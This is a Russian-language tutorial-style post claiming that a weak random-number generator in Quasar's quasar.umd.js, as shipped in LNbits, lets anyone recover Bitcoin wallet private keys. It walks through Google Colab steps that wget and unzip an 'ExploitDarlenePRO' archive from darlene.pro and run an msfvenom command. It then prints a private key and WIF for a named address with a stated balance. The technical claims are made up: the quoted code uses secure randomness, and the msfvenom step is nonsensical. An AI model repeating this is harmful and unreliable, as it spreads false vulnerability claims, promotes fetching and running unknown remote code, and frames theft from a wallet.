Как найти приватный ключ в бинарном коде от Bitcoin Lightning Wallet уязвимость в Quasar Framework

Разработчик David Shares из японской компании Bitcoin Portal опубликовал множество документов.

LNbits node manager работает с сервисами:

Разработчик David Shares из японской компании Bitcoin Portal опубликовал хронологический список, который показывает, что Lightning Network тонет в технических проблемах, ошибках, недостатках, критических замечаниях и эксплойтах. Это слишком обещанная технология, которая не обеспечивает децентрализации и еще далека от того, чтобы стать функциональной и безопасной для пользователей.

Ошибка в коде quasar.umd.js

// Use best available PRNG var randomBytes = (function () { // Node & Browser support var lib = typeof crypto !== 'undefined' ? crypto : ( typeof window !== 'undefined' ? window.msCrypto // IE11 : void 0 ); if (lib !== void 0) { if (lib.randomBytes !== void 0) { return lib.randomBytes } if (lib.getRandomValues !== void 0) { return function (n) { var bytes = new Uint8Array(n); lib.getRandomValues(bytes); return bytes } } }

В случае слабого генератора псевдослучайных чисел (PRNG) нам дается возможность получить SEED и полностью определить приватный ключ к Биткоин Кошельку, так как метод lib.getRandomValues теряет криптостойкость над случайным значением.

Перейдем к практической части:

Google Colaboratory

Google Colaboratory

colab.research.google.com

Биткоин Кошелек: В сентябре 2023 года была кража на сумму: 11032.77 долларов США // БИТКОИН: 0.30412330 BTC

Bitcoin_Lightning_Wallet_Vulnerability.ipynb

Откроем сервис Google Colab по ссылке: https://colab.research.google.com

Нажимаем на "+" и “Создаем новый блокнот”

Установим Ruby в Google Colab

!sudo apt install ruby-full

Проверим версию установки

!ruby --version

Установим библиотеку 'bitcoin-ruby' для взаимодействия с протоколом/сетью Биткоин

!gem install bitcoin-ruby

Установим библиотеку 'ecdsa' для реализации алгоритма цифровой подписи на эллиптической кривой (ECDSA)

!gem install ecdsa

Установим библиотеку 'base58' для преобразования целых или бинарных чисел в base58 и обратно.

!gem install base58

Установим библиотеку 'crypto' чтобы упростить операции с байтами и основными криптографическими операциями

!gem install crypto

Установим библиотеку 'config-hash' чтобы упростить работу с большими данными.

!gem install config-hash -v 0.9.0

Установим Metasploit Framework и воспользуемся MSFVenom

!git clone https://github.com/rapid7/metasploit-framework.git ls cd metasploit-framework/

ls

Опции:

!./msfvenom -help

Откроем код GitHub в воспользуемся уязвимым файлом: quasar.umd.js

В примечание мы видим ссылку на файл: quasar.umd.js

Откроем код:

LNbits, free and open-source Lightning wallet and accounts system

Установим lnbits в Google Colab:

!git clone https://github.com/lnbits/lnbits.git ls

Откроем уязвимый файл: quasar.umd.js через утилиту cat

cat lnbits/lnbits/static/vendor/quasar.umd.js

Откроем папки по каталогу: /modules/exploits/

ExploitDarlenePRO

cd modules/ ls cd exploits/ !wget https://darlene.pro/repository/21fa0f866f9f5fd22ce045e57f22185de1877dee25ad9d3974b7167a78957680/ExploitDarlenePRO.zip

Разархивируем содержимое ExploitDarlenePRO.zip через утилиту unzip

!unzip ExploitDarlenePRO.zip

ls cd ExploitDarlenePRO/ ls

Для запуска эксплойта перейдем обратно к Metasploit Framework

cd / cd content/metasploit-framework/ ls

Нам необходимо определить наш LHOST (Local Host) наш IP-address атакующей виртуальной машины.

Запустим команды:

!ip addr !hostname -I

Воспользуемся инструментом для создания полезной нагрузки MSFVenom

Для эксплуатации выбираем Биткоин Кошелек: 1qzgi39y33HrM7mHsZ6FaNspHCraJe62F

Команда запуска:

!./msfvenom 1qzgi39y33HrM7mHsZ6FaNspHCraJe62F -p modules/exploits/ExploitDarlenePRO LHOST=172.28.0.12 -f RB -o main.rb -p lnbits/lnbits/static/vendor LHOST=172.28.0.12 -f JS -o quasar.umd.js

Результат:

111111001110010001110101111111111100101000011100101000100111001101111110010101100111010110111001011100010100001000110001010011010000010111110001011101110100101001010010110110000111011010010010110000101111001000110010010100111011011111010100011111100011011

Полученный бинарный формат нам необходимо сохранить в файл: binary.txt воспользуемся утилитой echo

Команда:

!echo '111111001110010001110101111111111100101000011100101000100111001101111110010101100111010110111001011100010100001000110001010011010000010111110001011101110100101001010010110110000111011010010010110000101111001000110010010100111011011111010100011111100011011' > binary.txt

Конвертируем бинарный формат в HEX-формат для получение приватного ключа Биткоин Кошелька:

Воспользуемся кодом:

binaryFile = open("binary.txt", "r") binaryFile = binaryFile.readlines() hexFile = open("hex.txt", "w+") # loop through each line of binaryFile then convert and write to hexFile for line in binaryFile: binaryCode = line.replace(" ", "") hexCode = hex(int(binaryCode, 2)) hexCode = hexCode.replace("0x", "").upper().zfill(4) hexFile.write(hexCode + "\n") # close hexFile hexFile.close()

Откроем файл: hex.txt

cat hex.txt

Приватный Ключ Найден!

Установим модуль Bitcoin

!pip3 install bitcoin

from bitcoin import * with open("hex.txt","r") as f: content = f.readlines() # you may also want to remove whitespace characters like `\n` at the end of each line content = [x.strip() for x in content] f.close() outfile = open("privtoaddr.txt","w") for x in content: outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n") outfile.close()

cat privtoaddr.txt

Результат:

7E723AFFE50E5139BF2B3ADCB8A118A682F8BBA5296C3B4961791929DBEA3F1B:1qzgi39y33HrM7mHsZ6FaNspHCraJe62F

Все верно! Приватный ключ соответствует Биткоин Кошельку.

Откроем bitaddress и проверим:

ADDR: 1qzgi39y33HrM7mHsZ6FaNspHCraJe62F WIF: L1TWHkT6HcNVHCjsUpGecyZQqGJC5Ek98HunmRH4c3zb8V87NUiP HEX: 7E723AFFE50E5139BF2B3ADCB8A118A682F8BBA5296C3B4961791929DBEA3F1B

Address: undefined

The most popular and trusted block explorer and crypto transaction search engine.

www.blockchain.com

BALANCE: $ 11032.77

References: